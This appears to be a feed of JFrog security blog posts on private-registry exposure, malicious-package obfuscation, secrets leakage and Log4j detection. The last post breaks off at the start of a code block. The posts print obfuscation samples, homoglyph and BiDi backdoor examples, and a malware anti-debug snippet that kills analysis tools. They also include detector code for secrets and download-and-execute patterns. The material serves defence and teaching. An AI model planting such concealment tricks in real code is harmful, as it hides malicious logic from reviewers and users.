Prevent Inadvertent Software Supply Chain Exposures When Allowing Public Access to Private Registries https://jfrog.com/blog/prevent-inadvertent-software-supply-chain-exposures-when-allowing-public-access-to-private-registries/ Thu, 09 Feb 2023 16:38:26 +0000

At JFrog, we’re serious about software supply chain security. As a CVE Numbering Authority, our JFrog Security Research team regularly discovers and discloses new malicious packages and vulnerabilities posing a threat to development organizations. We know that in order to deliver trusted software on demand, you must have a secure software supply chain — making security a priority in everything we do.

While organizations are oftentimes hyper-focused on finding CVEs, blocking malicious packages, or preventing runtime attacks, we can’t forget about the security of the tools you use to manage and deliver your supply chains. Probably the most foundational of those tools is where you store and manage your packages, builds, binaries and artifacts — such as JFrog Artifactory. Let’s take a look at one key area that can open up your organization to software supply chain attacks if you’re not careful — allowing public access to your private registries or repositories.

Allowing public access to your private registries

The whole point of having private package repositories and registries is to ensure control over which software components are included in your software supply chain and who can access them. So why would you want to allow any random person on the internet to access your private registries?

There are many legitimate reasons a business would want to allow anonymous users to access their registries/repos:

  • Providing easy access to/download of public facing software such as libraries and SDKs
  • Collaborating with internal or external development teams who need to access the latest versions of 1st party software components
  • Allowing public access to non-sensitive information, such as documentation
  • Supporting integrations and automation with third-party applications and services
  • Contributing to open source projects

The issue with allowing public access to repos/registries arises when they’re made public accidentally or when artifacts containing sensitive information such as user tokens, credentials, and keys are accidentally stored in repositories with “public” access.

Avoiding misconfigurations and accidental exposures

The good news is, whether you intend to allow public access to your registries or not, it’s fairly straightforward to keep this part of your supply chain secure. Here are four easy steps you can take to prevent inadvertently exposing yourself.

1. Double-check your security configurations

This is probably the easiest preventative measure you can take today (and you should probably take a quick moment after you’re done reading this to go do it!). Third-party solutions for private registries/repos typically have configurations that allow admins to set whether a repo/registry can be accessed by users not managed under your development organization.

For example, here’s how you can double-check that you don’t accidentally have this setting turned on in Artifactory:

As an admin, log in and navigate to Administration > User Management > Settings (see screenshot below for reference).

If the “Allow Anonymous Access” setting is checked, you’re opening the gate for non-logged-in users to potentially access your repos.
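As a complementary check, you can probe from the outside: request a known artifact path with no credentials and see what comes back. The sketch below uses only the Python standard library; the base URL and repository path are placeholders you’d replace with your own.

```python
import urllib.request
import urllib.error

def probe_anonymous_access(base_url: str, artifact_path: str) -> int:
    """Request an artifact with no credentials and return the HTTP status code."""
    url = f"{base_url.rstrip('/')}/{artifact_path.lstrip('/')}"
    try:
        with urllib.request.urlopen(url) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code

def interpret_status(status: int) -> str:
    """A 200 means an unauthenticated client could read the artifact."""
    if status == 200:
        return "anonymous read allowed"
    if status in (401, 403):
        return "anonymous access denied"
    return "inconclusive"

# Example with a placeholder instance URL and repo path:
# print(interpret_status(probe_anonymous_access(
#     "https://mycompany.jfrog.io/artifactory",
#     "libs-release/com/example/app.jar")))
```

Run this against a path you believe is private; anything other than a 401/403 for an unauthenticated request deserves a closer look.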

2. Double-check your user permissions

If you do want to allow non-logged-in access to your registries, it’s probably best to double check what anonymous users can access and do with the artifacts in those repos/registries. Your solution should have robust RBAC settings, including for anonymous users.

For Artifactory you can check those permissions by navigating to Administration > User Management > Users > “anonymous” user (see screenshot below for reference).

When you click on the user you can see what permissions anonymous users are granted. In Artifactory you create permission sets and then add users/user groups to them. You can manage your permissions via the “Permissions” section under “User Management” (see documentation for more details).

A best practice we recommend is setting anonymous users to read only and clearly defining which repos they have access to.
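To make this concrete, here is what such a read-only grant could look like as a permission-target payload. The repository and target names are made up for illustration, and you should consult the Artifactory REST API documentation for the exact payload shape your version expects.

```python
import json

# Illustrative permission target granting the built-in "anonymous" user
# read-only ("r") access to a single public-facing repository.
# The target name and repository name are hypothetical examples.
permission_target = {
    "name": "public-read-only",
    "includesPattern": "**",
    "excludesPattern": "",
    "repositories": ["public-libs-release"],
    "principals": {
        # read only -- no deploy, delete, annotate, or manage permissions
        "users": {"anonymous": ["r"]}
    },
}

payload = json.dumps(permission_target, indent=2)
print(payload)
```

The key point is the principals block: anonymous gets exactly one capability, read, and only on repositories explicitly listed.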

3. Keep public and private content separate

At a bare minimum, you should establish separate repositories for artifacts that are intended to be publicly consumed. However, best practice is to not mix private content with public content within the same Artifactory instance, or whatever repository/registry solution you use. Instead, keep public and private assets on separate instances with a different set of permissions and access controls.

Clearly define who within your organization can deploy artifacts into your public-facing instance and regularly review the contents of those registries to ensure only appropriate artifacts are stored there.

These actions ensure public content doesn’t inadvertently get co-mingled with private assets and reduce the likelihood of misconfigurations.

4. Scan your public-facing registries for secrets

After you’ve double checked all your settings and permissions, and created a dedicated space to manage public content, there is an additional layer of protection you can add – leveraging a security tool to scan the contents of public-facing registries/repos for secrets. Taking this final step will help ensure you’re not exposing sensitive information via the components within the repo/registry.

If you’re using JFrog Artifactory and Xray this can be configured to occur any time an artifact is deployed to the public-facing repository and even automatically block the artifact from being deployed if secrets are detected.
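Xray’s scanners are far more sophisticated, but the core idea can be illustrated with a toy check: match artifact contents against well-known token formats before allowing a deploy. This is a simplified sketch using two widely documented secret formats, not a description of how Xray works internally.

```python
import re

# Two widely documented secret formats; real scanners cover many more
# token types and also verify candidate tokens dynamically.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(AKIA|ASIA)[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"),
}

def find_secrets(text: str) -> list[str]:
    """Return the names of secret patterns found in the given text."""
    return [name for name, pat in SECRET_PATTERNS.items() if pat.search(text)]

def should_block_deploy(text: str) -> bool:
    """Gate a deploy: block if any secret pattern matches."""
    return bool(find_secrets(text))

# AWS's own documented example key ID triggers the check:
print(should_block_deploy("aws_key = 'AKIAIOSFODNN7EXAMPLE'"))  # True
```

A real pipeline would run a check like this (or, better, a dedicated tool) on every artifact before it lands in a public-facing repository.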

Preventing misconfigurations in the first place

JFrog is serious about secure software supply chains, from the components within them to the tools used to deliver them. While allowing anonymous access to private repositories is a feature supported in Artifactory, it’s not enabled by default. Seeing that we can do even more to protect our users against misconfiguring undesired public access to repositories, we’re taking the following actions, and recommend other solution providers do the same:

  1. UI changes that make it less likely a setting was selected in error, in addition to updating the labels around these settings
  2. If a configuration is set that could impact supply chain security, admins will be alerted in plain language as to the implications, and have to verify the configuration is intended.
  3. Default settings that highly restrict what “anonymous” users – if enabled – can access and do in public-facing registries.

Now you know how to prevent inadvertently exposing private registries/repos and mitigate risk when intentionally doing so. If you’d like to learn how you can better secure your software supply chain, check out our regular Solution Engineering sessions for JFrog Artifactory or JFrog Xray where we answer your questions and share best practices to deliver trusted software with JFrog Platform.

Thanks to our colleagues at Aqua Nautilus, Aqua Security’s research team, for recently highlighting this concern.

Detecting Malicious Packages and How They Obfuscate Their Malicious Code https://jfrog.com/blog/detecting-known-and-unknown-malicious-packages-and-how-they-obfuscate-their-malicious-code/ Mon, 30 Jan 2023 15:46:50 +0000

Wow! We made it to the last post in our Malicious Packages series. While parting is such sweet sorrow, we hope blogs one, two, and three provide insights into the havoc malicious packages cause throughout your DevOps and DevSecOps pipelines. 

In the prior posts:

Now let’s look at attackers’ other, more discreet interest when creating a malicious package: hiding malicious code. Finally, we’ll show how malicious packages can be detected and prevented.

Obfuscation techniques attackers use to hide payloads in malicious packages

Besides performing a successful infection and payload execution, malicious package authors want to avoid having their malicious activity detected.

To achieve a reasonable success rate, attackers aim to evade detection by code analysis security tools and to make it hard for security researchers to reverse engineer their malicious packages. A widespread technique for achieving these goals is code obfuscation: modifying code so that it is difficult to read and analyze while it remains fully functional.

We’ll discuss several code obfuscation techniques, including off-the-shelf public obfuscators, custom obfuscation techniques, and the invisible backdoors technique, which isn’t necessarily an obfuscation method by itself, but rather a technique to invisibly change the source code logic without producing visual artifacts.

Public obfuscator example: python-obfuscator library

In July 2021, JFrog security researchers detected a malicious package called noblesse that used a popular public Python obfuscator, simply called Python obfuscation tool. The obfuscation mechanism used in this tool is a simple encoding of Python code with base64, decoding it at runtime, compiling it, and executing it.

import base64, codecs
magic = 'cHJpbnQ'
love = 'bVxuyoT'
god = 'xvIHdvc'
destiny = 'zkxVFVc'
joy = '\x72\x6f\x74\x31\x33'
trust = eval('\x6d\x61\x67\x69\x63') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x6c\x6f\x76\x65\x2c\x20\x6a\x6f\x79\x29') + eval('\x67\x6f\x64') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x64\x65\x73\x74\x69\x6e\x79\x2c\x20\x6a\x6f\x79\x29')
eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'<string>','exec'))

In the code snippet above, we can see an example of a Hello World print that was obfuscated automatically with this tool. Note the base64 strings, their decoding with the b64decode() function, and the compile() and eval() calls that execute the decoded code.

This obfuscation trick can fool a simple static analysis tool, but not a more thorough analysis tool. For example, our automatic malicious code detectors are aware of this simple obfuscation technique and flag the obfuscated code.
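A minimal sketch shows why this pattern is easy to flag: the mere co-occurrence of base64 decoding with dynamic-execution primitives is a strong signal, regardless of what the strings decode to. (Our production detectors are considerably more involved; this is only an illustration.)

```python
import re

# Decoding and dynamic-execution primitives whose co-occurrence is suspicious.
DECODE_CALLS = re.compile(r"\b(?:base64\.b64decode|codecs\.decode)\s*\(")
EXEC_CALLS = re.compile(r"\b(?:eval|exec|compile)\s*\(")

def looks_obfuscated(source: str) -> bool:
    """Flag source that both decodes data and dynamically executes code."""
    return bool(DECODE_CALLS.search(source)) and bool(EXEC_CALLS.search(source))

sample = "eval(compile(base64.b64decode(payload), '<string>', 'exec'))"
print(looks_obfuscated(sample))  # True
print(looks_obfuscated("print('hello')"))  # False
```

A text-level heuristic like this produces false positives on legitimate code, which is why real scanners combine many signals before raising an alert.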

The control flow flattening obfuscation technique

Control flow flattening is a technique in which the code’s control flow structure is broken into blocks that are placed next to each other, instead of retaining their original nesting levels.

In December 2021, JFrog security researchers detected a malicious package called discord-lofy that used a combination of several obfuscation techniques, one of them control flow flattening. The payload in this package was a Discord token grabber, and typosquatting and trojan infection methods helped spread it.

We can look at this technique with an example from the published paper Obfuscating C++ Programs via Control Flow Flattening that explained this method with a simple example in the diagram below:

Looking at the original code on the left side of the diagram, we can split it into three code blocks: first the variable initialization, then a while loop with a break condition, and finally the code block inside the while loop.

The right side of the diagram shows the code after applying the obfuscation. The three code blocks were flattened, and a switch case is used to control the flow of the code. A newly added variable, swVar, holds the number of the code block to execute, and at the end of each code block its value changes to indicate the next block that should run.
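To make the transformation concrete, here is the same idea expressed in Python (the paper’s example is C++): a simple counting loop, followed by a flattened version driven by a dispatch variable. Both compute the same result.

```python
def original() -> int:
    # Block 1: initialization; Block 2: loop condition; Block 3: loop body.
    total, i = 0, 0
    while i < 5:
        total += i
        i += 1
    return total

def flattened() -> int:
    # The same three blocks laid out flat; sw_var selects the next block.
    total = i = 0
    sw_var = 1
    while True:
        if sw_var == 1:      # initialization block
            total, i = 0, 0
            sw_var = 2
        elif sw_var == 2:    # loop-condition block
            sw_var = 3 if i < 5 else 0
        elif sw_var == 3:    # loop-body block
            total += i
            i += 1
            sw_var = 2
        else:                # exit
            return total

print(original(), flattened())  # 10 10
```

The flattened form obscures the nesting structure from a human reader while behaving identically at runtime.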

Using homoglyph characters to hide malicious code

The homoglyph characters method isn’t an obfuscator by itself, but it can be used to hide malicious code modifications in legitimate software packages. This technique was published in the TrojanSource paper and demonstrates the possibility of changing source code invisibly. In other words, the logic of the code changes to contain a vulnerability or malicious code, for example, without producing any visual artifacts.

In this technique, attackers can use Unicode characters that look like standard ASCII Latin characters that an average reader would overlook. Still, the compiler or the interpreter will treat them differently, so the logic of the code changes.

Supply-chain attackers can use this technique to plant invisible backdoors into popular source code repositories. For example, an attacker might change a string literal check or a function call to make it always succeed or fail invisibly by changing one of the string’s characters to a homoglyph.

In the following code snippet example below, the two functions appear identical. However, the bottom function name uses the Cyrillic Н character, which counts as a completely different function name. Code later in the program may call either of these two functions in an indistinguishable manner.

void sayHello() {
    std::cout << "Hello, World!\n";
}

void sayНello() {
    std::cout << "Bye, World!\n";
}
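One way to surface such tricks during review is to flag any identifier containing non-ASCII characters, since most codebases use plain ASCII names. A minimal sketch of such a check (using a simplified identifier regex, not a full parser):

```python
import re
import unicodedata

# Simplified identifier pattern: a letter/underscore followed by word chars.
IDENT = re.compile(r"[^\W\d]\w*")

def suspicious_identifiers(source: str) -> list[str]:
    """Return identifiers containing non-ASCII characters, with their names."""
    found = []
    for match in IDENT.finditer(source):
        name = match.group()
        if not name.isascii():
            chars = [unicodedata.name(c, "?") for c in name if not c.isascii()]
            found.append(f"{name}: {', '.join(chars)}")
    return found

# The second function name hides a Cyrillic 'Н' in place of Latin 'H'.
code = "def sayHello(): pass\ndef say\u041dello(): pass\n"
for hit in suspicious_identifiers(code):
    print(hit)
```

Running it on the snippet above reports the homoglyph identifier and names the offending Unicode character, making the invisible difference visible.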

Using bidirectional control characters to hide malicious code

Another invisible method introduced in the TrojanSource paper was the Unicode bidirectional (or BiDi) control characters. These characters control text flow (either left-to-right or right-to-left). When using BiDi control characters in a source code, the Unicode encoding can produce strange artifacts, such as a source code line that visually appears in one way but is parsed by the compiler in another.

For example, look at this original code snippet below:

int main() {
bool isAdmin = false;
/* begin admins only */ if (isAdmin) {
    printf("You are an admin.\n");
/* end admins only */ }
return 0;
}

To the reader, the code appears never to print “You are an admin” since isAdmin = false. However, as seen in the snippet below, if a Unicode BiDi control character is inserted at the right position in the condition check, the compiler can interpret the condition-check line as part of a comment, so the entire check is bypassed.

When inserting a BiDi character in the condition check:

int main() {
bool isAdmin = false;
/* begin admins only if (isAdmin)  */ {
    printf("You are an admin.\n");
/* end admins only */ }
return 0;
}
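Because these control characters are invisible, tooling is the reliable defense. The check itself is simple: scan source text for Unicode BiDi control code points. A sketch (many linters and compilers now warn on these characters as well):

```python
# Unicode bidirectional control characters abused by the TrojanSource technique.
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF",
    "\u202d": "LRO", "\u202e": "RLO",
    "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI", "\u2069": "PDI",
}

def find_bidi_chars(source: str) -> list[tuple[int, str]]:
    """Return (offset, short name) for every BiDi control character found."""
    return [(i, BIDI_CONTROLS[c]) for i, c in enumerate(source)
            if c in BIDI_CONTROLS]

clean = "if (isAdmin) { }"
tainted = "/* begin admins only \u202e */ if (isAdmin) {"
print(find_bidi_chars(clean))    # []
print(find_bidi_chars(tainted))  # [(21, 'RLO')]
```

Any hit in source code (outside of legitimately bidirectional string literals) is worth a manual look.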

Anti-Debug techniques

In addition to code obfuscation, attackers make analysis by researchers and automated tools more difficult by detecting debugging tools from within the malicious code.

JFrog Security researchers found and disclosed a malicious Python package called cookiezlog, the first we observed using this kind of anti-debug technique. Alongside known obfuscation techniques like PyArmor and code compression, the package was found to use an open source anti-debugger for Python called Advanced-Anti-Debug.

One of this anti-debugger’s functions, check_processes(), checks whether a debugger process is running on the system by comparing the active process list against a list of over 50 known tools, including the following:

PROCNAMES = [
    "ProcessHacker.exe",
    "httpdebuggerui.exe",
    "wireshark.exe",
    "fiddler.exe",
    "regedit.exe",
...
]
 
for proc in psutil.process_iter():
    if proc.name() in PROCNAMES:
        proc.kill()

If any of these processes are running, the Anti-Debug code tries to kill the process via psutil.Process.kill. Read our full analysis of this Anti-debugger in our latest blog.

Now that we know the technical information of the infection, payload, obfuscation, and anti-debug techniques used in malicious packages, let’s finally discuss methods to detect malicious packages in the software development life cycle (SDLC).

How to identify known and unknown malicious packages

Detecting known malicious packages

Let’s start with detecting known malicious packages.

To get a complete picture of the malicious packages in our projects, we essentially need to list our project’s dependencies and detect all of the installed third-party software versions in our project. The artifact of this process is called the software bill of materials (SBOM), which includes information on the installed third-party software.

We can use the SBOM to query public repositories and check whether the third-party software packages we use are malicious. Taking PyPI or npm as examples, these repositories define processes by which users can report malicious packages, so the most efficient way to check for known malicious packages is to query those repositories.

Unfortunately, there are two problems when implementing this process. The first problem is that many repositories don’t save historical data. For example, in PyPI, malicious packages are removed from the repository when confirmed as malicious, leaving no way to tell whether a package, or specific versions of it, was detected as malicious in the past. Below is a screenshot of a malicious package called ecopower that we disclosed last year. As of today, there’s no trace of this package when searching for it on PyPI:

The tracking in npm is slightly better. Reported malicious packages are replaced with dummy code and they’re tagged as a Security holding package, as you can see in this screenshot below of a malicious package called colors-art in npm:

While this is good for tracking malicious packages, it’s not useful to track specific malicious versions of legitimate packages, because all versions are removed from the repository when they’re confirmed as malicious.

The second problem is that even if we wanted to use the repositories’ data to scan for malicious packages, common security auditing tools report vulnerabilities but not malicious packages. For instance, take a look at the following result of running the pip-audit tool after the malicious package ecopower was installed. The package couldn’t be scanned (as seen below) because it was removed from the PyPI repository after it was reported as malicious:

Because of these two problems, and because developers usually have to perform the audit process we just described at scale (i.e., as part of the SDLC), we essentially need to automate the process. This can be achieved by using a software composition analysis (SCA) tool integrated into our development and CI/CD process. It’s important to pick a security tool, like JFrog Xray, that collects and stores malicious package names and versions in an internal database and doesn’t rely only on information from external repositories such as npm and PyPI, which, as we saw, do not save historical data.
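The core of the automated check can be sketched in a few lines: enumerate installed distributions to form a minimal SBOM, then compare it against a maintained denylist of (name, version) pairs. The denylist entries below are placeholders; a tool like Xray maintains and updates this data for you.

```python
from importlib import metadata

# Placeholder denylist of known-bad (package, version) pairs. A real SCA tool
# maintains this database internally rather than relying on public registries.
DENYLIST = {("ecopower", "1.0.0"), ("colors-art", "1.0.1")}

def installed_packages() -> set[tuple[str, str]]:
    """Build a minimal SBOM: (name, version) of every installed distribution."""
    return {((d.metadata["Name"] or "").lower(), d.version)
            for d in metadata.distributions()}

def audit(packages: set[tuple[str, str]]) -> set[tuple[str, str]]:
    """Return installed packages that appear on the denylist."""
    return packages & DENYLIST

hits = audit(installed_packages())
print("malicious packages found:", hits or "none")
```

In CI, a non-empty result would break the build, which is exactly the kind of policy-driven automation discussed above.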

Detecting unknown malicious packages

The detection of unknown malicious packages is considered much harder technically, because we essentially deal with unknown threats, similar to finding a zero-day in the field of vulnerabilities. To detect unknown malicious packages, we need to find a way of identifying characteristics of malicious packages before they’re known as malicious.

The approach we took when developing JFrog Xray isn’t just to keep the Xray database updated with known malicious package names and versions. To detect unknown malicious packages, we also develop and run heuristic scanners that scan the code of software packages in public repositories and detect anomalies in them. The scanners try to find evidence of malicious activity in any of the attack phases we discussed in this blog series: in the infection methods, in the payload phase, and also by detecting hiding methods or obfuscation techniques.

The ability of the scanners to provide alerts of possible unknown malicious packages makes them the foundation for all of the malicious packages we discover, research, and disclose. In this blog series, we thoroughly analyzed some of the malicious packages we discovered with this technique, as well as in other blogs we publish.

Here’s a list of scanners we developed. Keep in mind that it’s theoretically possible to develop a scanner for every phase of the attack, so treat this list as a set of demonstrations of heuristic techniques; with it in mind, you can devise more techniques of your own if you’re interested in hunting unknown malicious packages.

Examples of scanners we developed:

  • For detecting the dependency confusion infection method, we developed scanners that find packages with high version numbers on remote public repositories and alert on possible impersonations.
  • For detecting Download & Execute payloads, we developed scanners that find code patterns of downloading a binary and executing it, using system functions we monitor in different languages.
  • For detecting sensitive data stealer payloads, we developed scanners that find code patterns of access to sensitive locations in the file system, using system functions we monitor in different languages.
  • For detecting obfuscation techniques, we developed scanners that alert on base64 decoding and other code characteristics of public obfuscators.
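As an illustration of the second scanner type above, a toy download-and-execute detector might look for a URL fetch feeding into a process-execution call within the same file. This is a deliberately simplified, text-level sketch; real scanners parse the code rather than pattern-match source text.

```python
import re

# Patterns for remote-fetch and process-execution calls we want to monitor.
DOWNLOAD = re.compile(r"\b(?:urllib\.request\.urlretrieve|requests\.get|urlopen)\s*\(")
EXECUTE = re.compile(r"\b(?:os\.system|subprocess\.(?:run|Popen|call)|exec)\s*\(")

def download_and_execute_risk(source: str) -> bool:
    """Flag files that both fetch remote content and spawn processes."""
    return bool(DOWNLOAD.search(source)) and bool(EXECUTE.search(source))

benign = "import requests\nr = requests.get(url)\nprint(r.status_code)\n"
suspect = (
    "urllib.request.urlretrieve(url, '/tmp/payload')\n"
    "subprocess.run(['/tmp/payload'])\n"
)
print(download_and_execute_risk(benign), download_and_execute_risk(suspect))
```

Both patterns must match before the file is flagged, which keeps noise down: fetching a URL alone, or spawning a process alone, is usually legitimate.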

Best practices for secure development to avoid malicious packages

We’re nearing the end of the blog series, but we won’t end without giving you several best practices for secure development to deal with a malicious package security threat:

  • The most important and basic defense against the malicious packages threat is to use a software composition analysis (SCA) tool, such as JFrog Xray, as part of your SDLC.
  • Define policies and automate actions as part of a DevSecOps process. If a malicious package is discovered in the process, it’s recommended to adopt a policy that breaks the build and raises an alert.
  • To prevent the dependency confusion infection method, you want to avoid automatically fetching a high-version malicious package unless the new version of your published software has passed your DevOps and DevSecOps tests. To achieve this, it’s recommended to configure your build system to exclude remote repositories for internal packages and to use strict versions for external dependencies in every build.
  • Use open source tools to help detect malicious packages and prevent them from infecting your projects:
    • jfrog-npm-tools: Open source tools JFrog developed and published to the community for npm package security.
    • piproxy: A small proxy server JFrog developed for pip that modifies pip behavior to install external packages only if the package was not found on any internal repository. This fixes the Dependency Confusion issue in pip.
    • npm_domain_check: A tool JFrog developed that detects npm dependencies that can be hijacked with domain takeover.
    • Confused: This tool checks for dependency confusion vulnerabilities in multiple package management systems.
    • PyPI-scan: This tool checks names similarity to find typosquatting packages.
  • Pyrsia.io: A new open source initiative JFrog announced last year, for creating a secure, distributed peer-to-peer packages repository that provides integrity for software packages. The project uses blockchain technology to establish a chain of provenance for open source packages. Read more about this at pyrsia.io.
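To enforce the strict-version recommendation above, a pre-build check can reject any requirements line that is not pinned to an exact version. The sketch below makes simplifying assumptions about line format (it ignores extras, environment markers, and hashes):

```python
import re

# Accept only lines of the form "name==version" (a simplified pattern).
PINNED = re.compile(r"^[A-Za-z0-9._-]+\s*==\s*[A-Za-z0-9.!+_-]+$")

def unpinned_requirements(requirements_text: str) -> list[str]:
    """Return requirement lines that are not pinned with '=='."""
    bad = []
    for line in requirements_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # skip blanks and comments
        if not PINNED.match(stripped):
            bad.append(stripped)
    return bad

reqs = "requests==2.31.0\nflask>=2.0\n# comment\nnumpy\n"
print(unpinned_requirements(reqs))  # ['flask>=2.0', 'numpy']
```

Failing the build whenever this returns a non-empty list prevents a surprise upgrade from silently pulling in a higher-version malicious package.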

This post concludes our Malicious Packages blog series, but this isn’t a farewell.

Register for JFrog’s upcoming webinars to continue your education.

Enterprise Package Management for Everyone https://jfrog.com/blog/enterprise-package-management-for-everyone/ Tue, 25 Oct 2022 13:37:13 +0000

Suppose you asked developers in the mid-2000s how they managed and compiled their binaries. You’d probably hear some anxiety-inducing answers (e.g., storing packages in git repositories or insecure file stores).

Thankfully, organizations now have various options for managing their first- and third-party packages, dependencies, and containers. Different tools offer different levels of package support and feature sets to improve your DevOps workflows, allowing organizations to decide based on the right mix of features to meet their needs.

As part of our normal community pulse check, we polled 200 software developers, engineers, and DevOps professionals in July of 2022 to see what tools they’re using to manage their binaries and compiled source code. Here are two critical takeaways we found. 

  1. JFrog takes the lead for enterprise organizations: For enterprise-sized organizations, JFrog Artifactory was the clear leading choice for both package management and container registry, as shown in the diagrams below, with 56% and 29% respectively choosing JFrog (compared to 16% and 19% for the next most popular options).
  2. SMBs use a variety of options to meet their needs: For package management, JFrog was still the favored option with 26% as seen in the diagrams below. But the distribution between used tools was much closer, with the following most popular choices having ~19% and ~14%. For container registry, JFrog came in second to AWS with 38% and 14%, respectively.

So while JFrog is the clear choice for enterprises to manage their packages and containers, smaller organizations are using a greater variety of options to meet their needs. 

Download the Complete Poll Infographic>

You don’t have to be an enterprise to get enterprise-grade quality

Enterprise-grade package management isn’t just for enterprises. 

There’s a common sentiment that you need to sacrifice when you’re at a smaller organization—either going without or selecting tools that may give more breadth of features but sacrificing the depth and completeness of those features. 

Here are just a few examples of how Artifactory can benefit smaller organizations immediately:

Improving build speed: Artifactory serves as a proxy to cache binaries from public registries to reduce latency and eliminate the possibility that a public registry is down or packages are unavailable. 

Increasing stability of CI/CD: Manage the inputs and outputs of your CI/CD pipelines in a single place that is stable, manageable, scales, and provides necessary metadata about your builds and artifacts. 

Production-ready: Serve production-ready assets to dynamic production environments from an always available, secure source. Artifactory is Kubernetes ready, providing a comprehensive, advanced container registry and Helm Chart repositories. 

And as you look to the future, here are a few ways in which adopting Artifactory lays the foundation for a constantly evolving world:

Truly Universal: The technologies you use today may not be the ones you need tomorrow. No other package manager natively supports as many package and file types as JFrog Artifactory, across local, remote, and virtual repositories, with HA and replication. Nor do others offer the same breadth of ecosystem support, easily integrating with the build and deployment tools you need to create and deliver software.

Cloud Flexibility: You can get started with Artifactory as a SaaS subscription in a matter of minutes, but as you grow, you might need to manage your binaries on-prem. Or you may want the freedom to take advantage of multiple public cloud providers.

Artifactory delivers hybrid and multi-cloud DevOps support with the same great experience. DevOps teams have unparalleled flexibility in where they host, build, and deploy. No other repository manager provides this level of freedom to create where and how you want to.

Limitless Scale:  With JFrog Artifactory as part of the JFrog DevOps Platform, you can access and deliver your software components anywhere with total control. Set up multiple connected instances of Artifactory and leverage JFrog Distribution, Connect, and PDN to ensure seamless software delivery to the edge. 

Holistic Security: Start with basic OSS and Container vulnerability scanning. As your security needs evolve, add advanced application security capabilities without needing to add a new solution. With Artifactory as your package manager and container registry, you can quickly turn on security through Software Composition Analysis (SCA) that has been thoughtfully integrated into the binary lifecycle management process – from curation through creation to consumption – securing and managing your software assets in a single place.

By choosing JFrog for package management, you lay a trusted foundation for scalable, flexible, and future-proof DevOps. You get essential capabilities today and efficiently meet the changing needs of your organization tomorrow without needing to replace the core element of your DevOps process.

But don’t take our word for it. Try Artifactory for yourself and see how package management with JFrog can benefit your organization. 

JFrog’s Advanced Security Scanners Discovered Thousands of Publicly Exposed API Tokens – And They’re Active https://jfrog.com/blog/jas-secrets-detection-reveals-active-tokens/ Thu, 20 Oct 2022 13:51:55 +0000

Read our full research report on InfoWorld

The JFrog Security Research team released the findings of a recent investigation wherein they uncovered thousands of publicly exposed, active API tokens. This was accomplished while the team tested the new Secrets Detection feature in the company’s JFrog Advanced Security solution, part of JFrog Xray.

The team scanned more than eight million artifacts in the most common open-source software registries: npm, PyPI, RubyGems, crates.io & DockerHub (both Dockerfiles and small Docker layers). Each artifact was analyzed using the Secrets Detection scanners to find and verify leaked API tokens. For npm and PyPI packages, the scan also included multiple versions of the same package to try and find tokens that were once available but removed in a later version.

Pie chart displaying number of artifacts that were analyzed by JFrog Secrets Detection by platform. DockerHub made up the biggest slice, with 5.78 million of the 8 million scanned artifacts.
  Analyzed artifacts per platform (in millions).


After scanning all token types supported by Secrets Detection and verifying the tokens dynamically, AWS, GCP, and Telegram API tokens were the most leaked tokens (in that order). Interestingly, AWS developers seemed more vigilant about revoking unused tokens, with 47% of AWS tokens found active, unlike GCP, which boasts an active token rate of ~73%.

Graph displaying data of the distribution of active/inactive tokens for repositories. AWS, GCP, and Telegram API tokens were the most-leaked tokens.
Distribution of active/inactive tokens for each repository.


Although the initial goal of their research was to find and fix false positives using JFrog Advanced Security, the research team uncovered more active secrets than expected, which prompted the detailed analysis. To complete the analysis, the team privately disclosed all leaked secrets to their respective code owners (ones who could be identified), offering them a chance to replace or revoke the secrets as needed.

Secrets Detection uncovered secrets exposed in source code, like plaintext API keys, credentials, expired certificates, or passwords, often forgotten and left exposed unintentionally. These secrets threaten software’s integrity, allowing bad actors to access confidential information, data, or private networks.

Read the in-depth JFrog Security research findings and the five best practices they recommend for safely storing tokens in this InfoWorld article, and stay tuned for more examples of how the new features of JFrog Advanced Security can help safeguard your software supply chain. 

Log4j Vulnerability Alert: 100s of Exposed Packages Uncovered in Maven Central https://jfrog.com/blog/log4j-vulnerability-alert-100s-of-exposed-packages-uncovered-in-maven-central/ Thu, 30 Dec 2021 15:17:00 +0000

The high risk associated with newly discovered vulnerabilities in the highly popular Apache Log4j library – CVE-2021-44228 (also known as Log4Shell) and CVE-2021-45046 – has led to a security frenzy of unusual scale and urgency. Developers and security teams are pressed to investigate the impact of Log4j vulnerabilities on their software, revealing multiple technical challenges in the process.

Since Log4Shell was publicized, the JFrog Security Research team set out to help the developer community deal with the new threat as quickly and efficiently as possible. As we analyzed the issue, we found that using project dependencies to detect possible inclusions of Log4j in the code, while valuable, does not detect all instances of Log4j code in use. This means that relying solely on dependency scanning can leave vulnerable applications unnoticed. To provide additional detection capabilities, we released specialized Log4j vulnerability scanning tools designed to identify the presence and utilization of Apache Log4j in both source code and binaries.

In our recent blog post: “Log4j Detection with JFrog OSS Scanning Tools” we outlined the approach we implemented to improve Log4j vulnerability detection by scanning beyond package dependencies. The following are new findings gathered while using our new OSS tools to scan Java packages in the Maven Central repository.

The Importance of In-Depth Scanning for Log4Shell Vulnerability

The obvious (but incomplete!) way to check for exposure to Log4Shell is to see whether a vulnerable version of Log4j is listed as a dependency of a project in the build configuration (`pom.xml`, `build.gradle` etc.). A more accurate, but admittedly more time-consuming approach is to check whether Log4j is included as a transitive dependency (`gradle -q dependencies` or `mvn dependency:tree`). Somewhat surprisingly, this method is also incomplete, and deeper investigation is required to make sure the final product does not contain vulnerable Log4j code.

The reason that scanning the full dependency list may miss instances of included Log4j code is that dependencies only specify external packages needed to build or run the current artifact. If the vulnerable code is inserted directly into the codebase, it is not a dependency. Therefore, for more precise detection of vulnerable Log4j code, we need to inspect the code itself.
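As an illustration of what such code-level inspection involves, here is a minimal sketch (our own simplified example, not the actual JFrog OSS scanning tool) that flags jars bundling Log4j class files directly – inclusions that a dependency tree would never show:

```java
import java.io.IOException;
import java.nio.file.Path;
import java.nio.file.Paths;
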